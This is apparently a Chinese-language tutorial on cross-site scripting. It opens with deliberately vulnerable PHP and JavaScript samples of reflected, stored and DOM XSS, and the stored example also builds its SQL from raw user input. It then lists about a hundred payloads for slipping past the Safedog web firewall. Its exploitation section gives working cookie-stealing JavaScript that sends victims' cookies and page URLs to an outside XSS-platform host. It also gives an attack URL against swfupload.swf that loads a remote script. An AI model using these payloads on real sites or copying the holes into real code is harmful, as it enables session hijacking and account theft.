xss也叫跨站脚本攻击,原因在于网站的前端因为对输入或者输出不严谨从而可以在网站插入脚本代码造成xss攻击。

xss形成分类

主要是分为反射型和存储型还有dom型

  1. 反射型 这里的提交参数没有进行过滤转义,导致输出处可直接执行脚本代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    
    <form action = "htmlzr.php" method = "get">
    name:<input type = "text" name = "htmlname">
    <input type = "submit" value = "提交">
    </form>
    <?php
    if(@$_GET['htmlname']){
    	echo $_GET['htmlname'];
    }
    ?>
    1. 存储型 这里的提交参数是存储在数据库里面的,也没有进行过滤或转义,导致数据库查询返回输出提交参数时可执行脚本代码
     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    
    <?php
    //这是插入的
    $conn = mysqli_connect('localhost','root','root','test');
    if (mysqli_connect_errno($conn)){
    	echo "连接 MySQL 失败: " . mysqli_connect_error(); 
    }
    if(@$_POST['name1']){
    	$name = $_POST['name1'];
    	$sql = "INSERT INTO user (name) VALUES ('{$name}')";
    	if (mysqli_query($conn, $sql)) {
    echo "添加成功";
    	} else {
    echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
    }
    ?>
    
    <?php
    //这是输出的
    $conn = mysqli_connect('localhost','root','root','test');
    if(! $conn )
    {
    die('连接失败: ' . mysqli_error($conn));
    }
    mysqli_query($conn , "set names utf8");
    $sql = 'select * from user where uid=3;';
    
    if (mysqli_query($conn, $sql)) {
    	$row = mysqli_fetch_array(mysqli_query($conn, $sql),MYSQLI_ASSOC);
    	echo $row['name'];
    	} else {
    echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
    ?>
    
  2. dom型 我还是喜欢把他归类为反射型xss,这里的document.write的可执行脚本代码,//write() 方法可向文档写入 HTML 表达式或 JavaScript 代码。

    1
    2
    3
    4
    
    <script>
    var a  = document.URL;
    document.write(decodeURI(a.substring(document.URL.ndexOf("content=") + 4)));
    </script>

    xss bypass safedog

    过狗方法总结

    XSS过滤绕过速查表

    利用JavaScript全局变量绕过XSS过滤器

    无需括号和分号的XSS

    部分过狗payloads(来自ChaBug)

      1
      2
      3
      4
      5
      6
      7
      8
      9
     10
     11
     12
     13
     14
     15
     16
     17
     18
     19
     20
     21
     22
     23
     24
     25
     26
     27
     28
     29
     30
     31
     32
     33
     34
     35
     36
     37
     38
     39
     40
     41
     42
     43
     44
     45
     46
     47
     48
     49
     50
     51
     52
     53
     54
     55
     56
     57
     58
     59
     60
     61
     62
     63
     64
     65
     66
     67
     68
     69
     70
     71
     72
     73
     74
     75
     76
     77
     78
     79
     80
     81
     82
     83
     84
     85
     86
     87
     88
     89
     90
     91
     92
     93
     94
     95
     96
     97
     98
     99
    100
    
    <a onclick="javascript:alert(0)">a
    <javascript onclick="javascript:alert(0)">a
    <b onclick="javascript:alert(0)">a
    <abbr onclick="javascript:alert(0)">a
    <acronym onclick="javascript:alert(0)">a
    <address onclick="javascript:alert(0)">a
    <applet onclick="javascript:alert(0)">a
    <article onclick="javascript:alert(0)">a
    <xss onclick="javascript:alert(0)">a
    <aside onclick="javascript:alert(0)">a
    <bdi onclick="javascript:alert(0)">a
    <bdo onclick="javascript:alert(0)">a
    <big onclick="javascript:alert(0)">a
    <button onclick="javascript:alert(0)">a
    <del onclick="javascript:alert(0)">a
    <details onclick="javascript:alert(0)">a
    <div onclick="javascript:alert(0)">a
    <dfn onclick="javascript:alert(0)">a
    <dl onclick="javascript:alert(0)">a
    <dt onclick="javascript:alert(0)">a
    <h1 onclick="javascript:alert(0)">a
    <h2 onclick="javascript:alert(0)">a
    <h3 onclick="javascript:alert(0)">a
    <h4 onclick="javascript:alert(0)">a
    <h5 onclick="javascript:alert(0)">a
    <h6 onclick="javascript:alert(0)">a
    <header onclick="javascript:alert(0)">a
    <hr onclick="javascript:alert(0)">a
    <html onclick="javascript:alert(0)">a
    <kbd onclick="javascript:alert(0)">a
    <map onclick="javascript:alert(0)">a
    <mark onclick="javascript:alert(0)">a
    <menu onclick="javascript:alert(0)">a
    <menuitem onclick="javascript:alert(0)">a
    <meter onclick="javascript:alert(0)">a
    <q onclick="javascript:alert(0)">a
    <var onclick="javascript:alert(0)">a
    <xmp onclick="javascript:alert(0)">a
    <addons onclick="javascript:alert(0)">a
    <ascii onclick="javascript:alert(0)">a
    <aspx onclick="javascript:alert(0)">a
    <java onclick="javascript:alert(0)">a
    <mobile onclick="javascript:alert(0)">a
    <go onclick="javascript:alert(0)">a
    <alibaba onclick="javascript:alert(0)">a
    <baidu onclick="javascript:alert(0)">a
    <google onclick="javascript:alert(0)">a
    <github onclick="javascript:alert(0)">a
    <acu onclick="javascript:alert(0)">a
    <mail onclick="javascript:alert(0)">a
    <a onmouseover="javascript:alert(0)">a
    <javascript onmouseover="javascript:alert(0)">a
    <b onmouseover="javascript:alert(0)">a
    <abbr onmouseover="javascript:alert(0)">a
    <acronym onmouseover="javascript:alert(0)">a
    <address onmouseover="javascript:alert(0)">a
    <applet onmouseover="javascript:alert(0)">a
    <article onmouseover="javascript:alert(0)">a
    <xss onmouseover="javascript:alert(0)">a
    <aside onmouseover="javascript:alert(0)">a
    <bdi onmouseover="javascript:alert(0)">a
    <bdo onmouseover="javascript:alert(0)">a
    <big onmouseover="javascript:alert(0)">a
    <button onmouseover="javascript:alert(0)">a
    <del onmouseover="javascript:alert(0)">a
    <details onmouseover="javascript:alert(0)">a
    <div onmouseover="javascript:alert(0)">a
    <dfn onmouseover="javascript:alert(0)">a
    <dl onmouseover="javascript:alert(0)">a
    <dt onmouseover="javascript:alert(0)">a
    <h1 onmouseover="javascript:alert(0)">a
    <h2 onmouseover="javascript:alert(0)">a
    <h3 onmouseover="javascript:alert(0)">a
    <h4 onmouseover="javascript:alert(0)">a
    <h5 onmouseover="javascript:alert(0)">a
    <h6 onmouseover="javascript:alert(0)">a
    <header onmouseover="javascript:alert(0)">a
    <hr onmouseover="javascript:alert(0)">a
    <html onmouseover="javascript:alert(0)">a
    <kbd onmouseover="javascript:alert(0)">a
    <map onmouseover="javascript:alert(0)">a
    <mark onmouseover="javascript:alert(0)">a
    <menu onmouseover="javascript:alert(0)">a
    <menuitem onmouseover="javascript:alert(0)">a
    <meter onmouseover="javascript:alert(0)">a
    <q onmouseover="javascript:alert(0)">a
    <var onmouseover="javascript:alert(0)">a
    <xmp onmouseover="javascript:alert(0)">a
    <addons onmouseover="javascript:alert(0)">a
    <ascii onmouseover="javascript:alert(0)">a
    <aspx onmouseover="javascript:alert(0)">a
    <java onmouseover="javascript:alert(0)">a
    <mobile onmouseover="javascript:alert(0)">a
    <go onmouseover="javascript:alert(0)">a
    <alibaba onmouseover="javascript:alert(0)">a
    <baidu onmouseover="javascript:alert(0)">a
    <google onmouseover="javascript:alert(0)">a
    <github onmouseover="javascript:alert(0)">a
    <acu onmouseover="javascript:alert(0)">a
    <mail onmouseover="javascript:alert(0)">a

xss利用

xss的主要是盗取用户的cookie,修改网页的内容或者重定向到其他危险的网站,脚本代码一般也不用自己来编写一般有xss平台提供代码直接拿来用就ok

  1. 盗取cookie(xss平台的) 一般cookie都是有时间的,过了时间就没用这个问题只需要在xss平台把keepsession勾上就OK了

    1
    2
    
    function(){(new Image()).src='https://xsspt.com/index.php?do=api&id=4IobBm&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
    if(''==1){keep=new Image();keep.src='https://xsspt.com/index.php?do=keepsession&id=4IobBm&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

    现在是例子

    1
    
    www.xxxxx.com/statics/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;document.body.appendChild(document.createElement('script')).src='https://xsshs.cn/1Uzk'}}//
    

    现在我们分析一下这段代码 向swfupload.swf的movieName传值,这里在catch嵌套了一个if如果window.x为假则执行下面这段代码document.createElement(‘script’)).src=’https://xsshs.cn/1Uzk document.createElement在dom中创建元素节点script并代入script的src访问执行xss的网站 当有用户点击时,则会被记录cookie blockchain